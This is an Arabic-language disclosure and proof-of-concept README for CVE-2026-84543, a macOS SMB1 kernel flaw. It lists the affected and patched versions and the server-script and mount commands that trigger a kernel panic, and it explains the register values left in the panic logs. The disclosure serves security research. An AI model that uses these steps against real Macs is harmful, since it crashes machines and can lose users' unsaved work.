
إثبات مفهوم وإفصاح تقني عن CVE-2026-84543، وهي ثغرة أمنية في نواة SMB على macOS تؤدي إلى ذعر النواة عبر ردود SMB1 مُصمَّمة بعناية.
من المتوقع أن يؤدي إثبات المفهوم هذا إلى kernel-panic وإعادة تشغيل جهاز Mac متأثر.
كانت إصدارات الاختبار المتأثرة المستخدمة أثناء البحث هي macOS Tahoe 26.4 (25E246) و macOS 26.5 beta 4 (25F5068a). أصلحت Apple الثغرة CVE-2026-84543 في macOS Golden Gate 27، و Tahoe 26.7، و Sequoia 15.8.
smb1_unix_whoami_poc.py هو خادم التقاط الأدلة عبر loopback. يستخدم فقط
مكتبة Python القياسية و:
_COMM_PAGE_ASB_TARGET_KERN_VALUE الخاصة بالإقلاع الحالي على معالجات Apple silicon؛SMB_QFS_POSIX_WHOAMI (0x0202) مصممة خصيصًا لإنشاء
حالة عدم الاتساق بين العدّاد والمؤشر؛ و0x020B) التي تحتوي على قيم canary مميزة
لتتبع أصل سجلات panic.في الطرفية A:
cd poc
sudo python3 smb1_unix_whoami_poc.py \
--bind 127.0.0.1 \
--port 445 \
--log /tmp/CVE-2026-84543-poc.log
سجّل قيمة ASB_TARGET_KERN_VALUE المطبوعة؛ فهي عشوائية عند كل إقلاع.
في الطرفية B:
mkdir -p ~/mnt/cve-2026-84543
mount_smbfs //[email protected]/share ~/mnt/cve-2026-84543
مع كون T مساوية لقيمة canary المطبوعة للنواة عند الإقلاع:
x8 = T
x9 = T
x10 = T & 0x1ff
x11 = T
x12 = T & 0x7fffffff
x13 = 0
x14 = (T & 0x7fffffff) - 1
البتات المحددة في x8 و x9 و x11 تُثبت الأصل. العلاقات
الملاحَظة توفر رابطًا بايت-ببايت بين حقول استجابة الخادم
وحالة سجلات النواة الحية.